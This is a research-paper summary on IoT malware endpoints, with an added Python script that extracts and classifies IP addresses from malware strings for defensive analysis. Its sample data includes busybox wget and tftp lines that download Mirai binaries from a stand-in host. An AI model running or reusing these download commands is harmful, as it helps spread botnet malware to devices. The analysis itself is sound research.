Analyzing Endpoints in the Internet of Things Malware
Jinchun Choi, Afsah Anwar, Hisham Alasmary, Jeffrey Spaulding, DaeHun Nyang, Aziz Mohaisen

TL;DR
This paper analyzes the endpoints embedded in IoT malware: it reverse-engineers 2,423 samples to recover IP addresses, enriches them with Internet-wide scanner data (Shodan, Censys), and uses the result to characterize the affinity between dropzones and target IP addresses and the attack surface of the targeted devices.
Contribution
It introduces a data-driven approach to analyzing IoT malware endpoints, relating the dropzones that serve payloads to the target IP addresses the samples carry.
Findings
Characterized the affinity and recurring patterns between dropzones and their target IP addresses across 2,423 reverse-engineered samples.
Examined the attack surface of the target device space using endpoint information augmented from Shodan and Censys.
Provided a data-driven view of the endpoint infrastructure behind IoT malware.
Abstract
The lack of security measures in the Internet of Things (IoT) devices and their persistent online connectivity give adversaries an opportunity to target them or abuse them as intermediary targets for larger attacks such as distributed denial-of-service (DDoS) campaigns. In this paper, we analyze IoT malware with a focus on endpoints to understand the affinity between the dropzones and their target IP addresses, and to understand the different patterns among them. Towards this goal, we reverse-engineer 2,423 IoT malware samples to obtain IP addresses. We further augment additional information about the endpoints from Internet-wide scanners, including Shodan and Censys. We then perform a deep data-driven analysis of the dropzones and their target IP addresses and further examine the attack surface of the target device space.
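The abstract describes a pipeline: pull IP addresses out of reverse-engineered samples, enrich them with scanner observations, then separate dropzones from target endpoints and look at the exposed services of the targets. The script below is an added example of the mechanical part of that pipeline; it is not the authors' code. The malware strings, the dropzone heuristic (an address inside a wget/tftp/URL-style string), the non-routable filter and the shape of the scanner records are all constructed assumptions, and the addresses come from the RFC 5737 documentation ranges, which the filter deliberately keeps so the sample runs offline.

```python
"""Extract and tag endpoint IPs from IoT malware strings, then enrich them.

Added example, not code from the paper. Input strings are constructed to
mimic downloader/scanner strings found in IoT bot binaries; the roles and
scanner record layout are assumptions, not Shodan's or Censys's real schema.
"""
import ipaddress
import re
from collections import Counter

# Dotted IPv4 literal not glued to other digits/dots (avoids "1.2.3.4.5" and
# version-like fragments such as "v1.30.1" only partially matching).
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# Download-style context typical of second-stage fetch commands. Assumed
# heuristic for "dropzone", not the paper's classifier.
DROPZONE_CTX_RE = re.compile(r"(?:wget|tftp|curl|ftpget|https?://|tftp://)", re.I)

# Simplified bogon list. RFC 5737 documentation ranges (192.0.2/24, 198.51.100/24,
# 203.0.113/24) are intentionally NOT excluded so the constructed sample passes.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]

# Constructed strings, as if produced by `strings` on a reverse-engineered sample.
SAMPLE_STRINGS = [
    "/bin/busybox wget http://203.0.113.17/bins/mirai.arm7 -O /tmp/x",
    "/bin/busybox tftp -g -r mirai.mips 203.0.113.17",
    "198.51.100.44",                 # candidate report/C2 endpoint, no fetch context
    "POST /cdn-cgi/ HTTP/1.1",       # no address at all
    "192.168.1.1",                   # RFC 1918, dropped
    "127.0.0.1",                     # loopback, dropped
    "255.255.255.255",               # broadcast (240.0.0.0/4), dropped
    "999.1.1.1",                     # not a valid IPv4 address, dropped
    "scanner: 192.0.2.9 port 23",    # target-style endpoint
]

# Constructed scanner observations keyed by IP (assumed simplified layout).
SCAN_RECORDS = {
    "203.0.113.17": {"ports": [80, 22], "product": "nginx"},
    "192.0.2.9": {"ports": [23, 7547], "product": "busybox telnetd"},
}


def is_routable(ip_text):
    """True for a syntactically valid IPv4 address outside the bogon list."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return ip.version == 4 and not any(ip in net for net in NON_ROUTABLE)


def extract_endpoints(strings):
    """Return {ip: role} for routable IPv4 literals in the strings.

    role is "dropzone" when the address sits in a download-style string and
    "endpoint" otherwise; a dropzone hit wins if an IP appears both ways.
    """
    roles = {}
    for s in strings:
        role = "dropzone" if DROPZONE_CTX_RE.search(s) else "endpoint"
        for m in IPV4_RE.finditer(s):
            ip = m.group(0)
            if not is_routable(ip):
                continue
            if roles.get(ip) != "dropzone":
                roles[ip] = role
    return roles


def summarize(roles):
    """Count how many extracted addresses fall into each role."""
    return Counter(roles.values())


def enrich(roles, scan):
    """Attach scanner observations to each endpoint; None when never scanned."""
    return {ip: {"role": role, "scan": scan.get(ip)} for ip, role in roles.items()}


def attack_surface(enriched):
    """Count exposed ports over target endpoints (non-dropzones) seen by the scanner."""
    ports = Counter()
    for rec in enriched.values():
        if rec["role"] == "endpoint" and rec["scan"]:
            ports.update(rec["scan"]["ports"])
    return ports


if __name__ == "__main__":
    roles = extract_endpoints(SAMPLE_STRINGS)
    enriched = enrich(roles, SCAN_RECORDS)
    for ip, rec in enriched.items():
        print(ip, rec["role"], rec["scan"])
    print("roles:", dict(summarize(roles)))
    print("target ports:", dict(attack_surface(enriched)))
```

On real samples the strings would come from a disassembler or `strings` over unpacked binaries, and the scanner lookup would be an API call rather than an inline dictionary; the non-routable filter here is intentionally minimal (it keeps documentation ranges), so a production version should use a full bogon list and also drop addresses that only appear as version strings or timestamps.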
